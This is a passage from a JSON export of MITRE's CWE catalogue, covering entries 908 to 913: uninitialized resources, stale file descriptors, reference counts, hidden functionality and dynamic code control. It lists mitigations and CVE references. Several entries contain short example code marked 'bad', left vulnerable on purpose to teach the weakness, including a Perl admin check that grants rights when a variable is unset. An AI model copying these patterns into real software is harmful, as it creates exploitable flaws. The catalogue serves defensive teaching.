restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-229"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 4, "Authorization" Page 114; Chapter 6, "Determining Appropriate Access Control" Page 171"}},{"attr":{"@_External_Reference_ID":"REF-231"}},{"attr":{"@_External_Reference_ID":"REF-233"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, "Common Vulnerabilities of Authorization", Page 39"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-05-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"908":{"attr":{"@_ID":"908","@_Name":"Use of Uninitialized Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses or accesses a resource that has not been initialized.","Extended_Description":"When a resource has not been properly initialized, the software may behave unexpectedly. This may lead to a crash or invalid memory access, but the consequences vary depending on the type of resource and how it is used within the software.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"],"Note":"When reusing a resource such as memory or a program variable, the original contents of that resource may not be cleared before it is sent to an untrusted party."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The uninitialized resource may contain values that cause program flow to change in ways that the programmer did not intend."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Explicitly initialize the resource before use. If this is performed through an API function or standard procedure, follow all required steps."},{"Phase":"Implementation","Description":"Pay close attention to complex conditionals that affect initialization, since some branches might not perform the initialization."},{"Phase":"Implementation","Description":"Avoid race conditions (CWE-362) during initialization routines."},{"Phase":"Build and Compilation","Description":"Run or compile the software with settings that generate warnings about uninitialized variables or data."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-105"},"Intro_Text":"Here, a boolean initiailized field is consulted to ensure that initialization tasks are only completed once. However, the field is mistakenly set to true during static initialization, so the initialization code is never reached.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private boolean initialized = true;public void someMethod() {","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (!initialized) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...initialized = true;","xhtml:br":["","","",""],"xhtml:i":"// perform initialization tasks"}}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-54"},"Intro_Text":"The following code intends to limit certain operations to the administrator only.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {}if ($uid == 0) {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"$uid = ExtractUserID($state);","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAdminThings();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"# do stuff"}},"Body_Text":"If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to \\"0\\" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident."},{"attr":{"@_Demonstrative_Example_ID":"DX-106"},"Intro_Text":"The following code intends to concatenate a string to a variable and print the string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char str[20];strcat(str, \\"hello world\\");printf(\\"%s\\", str);","xhtml:br":["",""]}},"Body_Text":["This might seem innocent enough, but str was not initialized, so it contains random memory. As a result, str[0] might not contain the null terminator, so the copy might start at an offset other than 0. The consequences can vary, depending on the underlying memory.","If a null terminator is found before str[8], then some bytes of random garbage will be printed before the \\"hello world\\" string. The memory might contain sensitive information from previous uses, such as a password (which might occur as a result of CWE-14 or CWE-244). In this example, it might not be a big deal, but consider what could happen if large amounts of memory are printed out before the null terminator is found.","If a null terminator isn\'t found before str[8], then a buffer overflow could occur, since strcat will first look for the null terminator, then copy 12 bytes starting with that location. Alternately, a buffer over-read might occur (CWE-126) if a null terminator isn\'t found before the end of the memory segment is reached, leading to a segmentation fault and crash."]},{"attr":{"@_Demonstrative_Example_ID":"DX-144"},"Intro_Text":"This example will leave test_string in an\\n\\t\\t\\t unknown condition when i is the same value as err_val,\\n\\t\\t\\t because test_string is not initialized\\n\\t\\t\\t (CWE-456). Depending on where this code segment appears\\n\\t\\t\\t (e.g. within a function body), test_string might be\\n\\t\\t\\t random if it is stored on the heap or stack. If the\\n\\t\\t\\t variable is declared in static memory, it might be zero\\n\\t\\t\\t or NULL. Compiler optimization might contribute to the\\n\\t\\t\\t unpredictability of this address.","Example_Code":[{"#text":"char *test_string;if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string = \\"Done at the beginning\\";if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string;if (i != err_val){}else {}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"test_string = \\"Done on the other side!\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":[{"xhtml:p":["When the printf() is reached,\\n test_string might be an unexpected address, so the\\n printf might print junk strings (CWE-457).","To fix this code, there are a couple approaches to\\n\\t\\t\\t making sure that test_string has been properly set once\\n\\t\\t\\t it reaches the printf().","One solution would be to set test_string to an\\n\\t\\t\\t acceptable default before the conditional:"]},"Another solution is to ensure that each\\n\\t\\t\\t branch of the conditional - including the default/else\\n\\t\\t\\t branch - could ensure that test_string is set:"]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-9805","Description":"Chain: Creation of the packet client occurs before initialization is complete (CWE-696) resulting in a read from uninitialized memory (CWE-908), causing memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9805"},{"Reference":"CVE-2008-4197","Description":"Use of uninitialized memory may allow code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4197"},{"Reference":"CVE-2008-2934","Description":"Free of an uninitialized pointer leads to crash and possible code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2934"},{"Reference":"CVE-2008-0063","Description":"Product does not clear memory contents when generating an error message, leading to information leak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063"},{"Reference":"CVE-2008-0062","Description":"Lack of initialization triggers NULL pointer dereference or double-free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062"},{"Reference":"CVE-2008-0081","Description":"Uninitialized variable leads to code execution in popular desktop application.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0081"},{"Reference":"CVE-2008-3688","Description":"Chain: Uninitialized variable leads to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3688"},{"Reference":"CVE-2008-3475","Description":"Chain: Improper initialization leads to memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3475"},{"Reference":"CVE-2005-1036","Description":"Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1036"},{"Reference":"CVE-2008-3597","Description":"Chain: game server can access player data structures before initialization has happened leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3597"},{"Reference":"CVE-2009-2692","Description":"Chain: uninitialized function pointers can be dereferenced allowing code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692"},{"Reference":"CVE-2009-0949","Description":"Chain: improper initialization of memory can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0949"},{"Reference":"CVE-2009-3620","Description":"Chain: some unprivileged ioctls do not verify that a structure has been initialized before invocation, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP33-C","Entry_Name":"Do not read uninitialized memory","Mapping_Fit":"CWE More Abstract"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-436"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2012-12-21","Submission_Comment":"New weakness based on discussion on the CWE research list in December 2012."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"}]}},"909":{"attr":{"@_ID":"909","@_Name":"Missing Initialization of Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not initialize a critical resource.","Extended_Description":"Many resources require initialization before they can be properly used. If a resource is not initialized, it could contain unpredictable or expired data, or it could be initialized to defaults that are invalid. This can have security implications when the resource is expected to have certain properties or values.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"908","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"],"Note":"When reusing a resource such as memory or a program variable, the original contents of that resource may not be cleared before it is sent to an untrusted party."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The uninitialized resource may contain values that cause program flow to change in ways that the programmer did not intend."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Explicitly initialize the resource before use. If this is performed through an API function or standard procedure, follow all specified steps."},{"Phase":"Implementation","Description":"Pay close attention to complex conditionals that affect initialization, since some branches might not perform the initialization."},{"Phase":"Implementation","Description":"Avoid race conditions (CWE-362) during initialization routines."},{"Phase":"Build and Compilation","Description":"Run or compile your software with settings that generate warnings about uninitialized variables or data."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-105"},"Intro_Text":"Here, a boolean initiailized field is consulted to ensure that initialization tasks are only completed once. However, the field is mistakenly set to true during static initialization, so the initialization code is never reached.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private boolean initialized = true;public void someMethod() {","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (!initialized) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...initialized = true;","xhtml:br":["","","",""],"xhtml:i":"// perform initialization tasks"}}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-54"},"Intro_Text":"The following code intends to limit certain operations to the administrator only.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {}if ($uid == 0) {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"$uid = ExtractUserID($state);","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAdminThings();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"# do stuff"}},"Body_Text":"If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to \\"0\\" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident."},{"Intro_Text":"The following code intends to concatenate a string to a variable and print the string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char str[20];strcat(str, \\"hello world\\");printf(\\"%s\\", str);","xhtml:br":["",""]}},"Body_Text":["This might seem innocent enough, but str was not initialized, so it contains random memory. As a result, str[0] might not contain the null terminator, so the copy might start at an offset other than 0. The consequences can vary, depending on the underlying memory.","If a null terminator is found before str[8], then some bytes of random garbage will be printed before the \\"hello world\\" string. The memory might contain sensitive information from previous uses, such as a password (which might occur as a result of CWE-14 or CWE-244). In this example, it might not be a big deal, but consider what could happen if large amounts of memory are printed out before the null terminator is found.","If a null terminator isn\'t found before str[8], then a buffer overflow could occur, since strcat will first look for the null terminator, then copy 12 bytes starting with that location. Alternately, a buffer over-read might occur (CWE-126) if a null terminator isn\'t found before the end of the memory segment is reached, leading to a segmentation fault and crash."]},{"attr":{"@_Demonstrative_Example_ID":"DX-144"},"Intro_Text":"This example will leave test_string in an\\n\\t\\t\\t unknown condition when i is the same value as err_val,\\n\\t\\t\\t because test_string is not initialized\\n\\t\\t\\t (CWE-456). Depending on where this code segment appears\\n\\t\\t\\t (e.g. within a function body), test_string might be\\n\\t\\t\\t random if it is stored on the heap or stack. If the\\n\\t\\t\\t variable is declared in static memory, it might be zero\\n\\t\\t\\t or NULL. Compiler optimization might contribute to the\\n\\t\\t\\t unpredictability of this address.","Example_Code":[{"#text":"char *test_string;if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string = \\"Done at the beginning\\";if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string;if (i != err_val){}else {}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"test_string = \\"Done on the other side!\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":[{"xhtml:p":["When the printf() is reached,\\n test_string might be an unexpected address, so the\\n printf might print junk strings (CWE-457).","To fix this code, there are a couple approaches to\\n\\t\\t\\t making sure that test_string has been properly set once\\n\\t\\t\\t it reaches the printf().","One solution would be to set test_string to an\\n\\t\\t\\t acceptable default before the conditional:"]},"Another solution is to ensure that each\\n\\t\\t\\t branch of the conditional - including the default/else\\n\\t\\t\\t branch - could ensure that test_string is set:"]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-20739","Description":"A variable that has its value set in a conditional statement is sometimes used when the conditional fails, sometimes causing data leakage","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-20739"},{"Reference":"CVE-2005-1036","Description":"Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1036"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2012-12-21","Submission_Comment":"New weakness based on discussion on the CWE research list in December 2012."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"}]}},"910":{"attr":{"@_ID":"910","@_Name":"Use of Expired File Descriptor","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses or accesses a file descriptor after it has been closed.","Extended_Description":"After a file descriptor for a particular file or device has been released, it can be reused. The code might not write to the original file, since the reused file descriptor might reference a different file or device.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Stale file descriptor"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The program could read data from the wrong file."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"Accessing a file descriptor that has been closed can cause a crash."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO46-C","Entry_Name":"Do not access a closed file","Mapping_Fit":"Exact"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2012-12-21","Submission_Comment":"New weakness based on discussion on the CWE research list in December 2012."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"911":{"attr":{"@_ID":"911","@_Name":"Improper Update of Reference Count","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a reference count to manage a resource, but it does not update or incorrectly updates the reference count.","Extended_Description":"Reference counts can be used when tracking how many objects contain a reference to a particular resource, such as in memory management or garbage collection. When the reference count reaches zero, the resource can be de-allocated or reused because there are no more objects that use it. If the reference count accidentally reaches zero, then the resource might be released too soon, even though it is still in use. If all objects no longer use the resource, but the reference count is not zero, then the resource might not ever be released.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"672","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"772","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0574","Description":"chain: reference count is not decremented, leading to memory leak in OS by sending ICMP packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0574"},{"Reference":"CVE-2004-0114","Description":"Reference count for shared memory not decremented when a function fails, potentially allowing unprivileged users to read kernel memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0114"},{"Reference":"CVE-2006-3741","Description":"chain: improper reference count tracking leads to file descriptor consumption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3741"},{"Reference":"CVE-2007-1383","Description":"chain: integer overflow in reference counter causes the same variable to be destroyed twice.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1383"},{"Reference":"CVE-2007-1700","Description":"Incorrect reference count calculation leads to improper object destruction and code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1700"},{"Reference":"CVE-2008-2136","Description":"chain: incorrect update of reference count leads to memory leak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2136"},{"Reference":"CVE-2008-2785","Description":"chain/composite: use of incorrect data type for a reference counter allows an overflow of the counter, leading to a free of memory that is still in use.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2785"},{"Reference":"CVE-2008-5410","Description":"Improper reference counting leads to failure of cryptographic operations.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5410"},{"Reference":"CVE-2009-1709","Description":"chain: improper reference counting in a garbage collection routine leads to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1709"},{"Reference":"CVE-2009-3553","Description":"chain: reference count not correctly maintained when client disconnects during a large operation, leading to a use-after-free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3553"},{"Reference":"CVE-2009-3624","Description":"Reference count not always incremented, leading to crash or code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3624"},{"Reference":"CVE-2010-0176","Description":"improper reference counting leads to expired pointer dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0176"},{"Reference":"CVE-2010-0623","Description":"OS kernel increments reference count twice but only decrements once, leading to resource consumption and crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0623"},{"Reference":"CVE-2010-2549","Description":"OS kernel driver allows code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2549"},{"Reference":"CVE-2010-4593","Description":"improper reference counting leads to exhaustion of IP addresses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4593"},{"Reference":"CVE-2011-0695","Description":"Race condition causes reference counter to be decremented prematurely, leading to the destruction of still-active object and an invalid pointer dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0695"},{"Reference":"CVE-2012-4787","Description":"improper reference counting leads to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4787"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-884"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2012-12-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}]}},"912":{"attr":{"@_ID":"912","@_Name":"Hidden Functionality","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains functionality that is not documented, not part of the specification, and not accessible through an interface or command sequence that is obvious to the software\'s users or administrators.","Extended_Description":"Hidden functionality can take many forms, such as intentionally malicious code, \\"Easter Eggs\\" that contain extraneous functionality such as games, developer-friendly shortcuts that reduce maintenance or support costs such as hard-coded accounts, etc. From a security perspective, even when the functionality is not intentionally malicious or damaging, it can increase the software\'s attack surface and expose additional weaknesses beyond what is already exposed by the intended functionality. Even if it is not easily accessible, the hidden functionality could be useful for attacks that modify the control flow of the application.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Other","Integrity"],"Impact":["Varies by Context","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Installation","Description":"Always verify the integrity of the software that is being installed."},{"Phase":"Testing","Description":"Conduct a code coverage analysis using live testing, then closely inspect any code that is not covered."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"133"}},{"attr":{"@_CAPEC_ID":"190"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2012-12-28"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"913":{"attr":{"@_ID":"913","@_Name":"Improper Control of Dynamically-Managed Code Resources","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements.","Extended_Description":"Many languages offer powerful features that allow the programmer to dynamically create or modify existing code, or resources used by code such as variables and objects. While these features can offer significant flexibility and reduce development time, they can be extremely dangerous if attackers can directly influence these code resources in unexpected ways.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"},{"Scope":["Other","Integrity"],"Impact":["Varies by Context","Alter Execution Logic"]}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"For any externally-influenced input, check the input against an allowlist of acceptable values."},{"Phase":["Implementation","Architecture and Design"],"Strategy":"Refactoring","Description":"Refactor the code so that it does not need to be dynamically 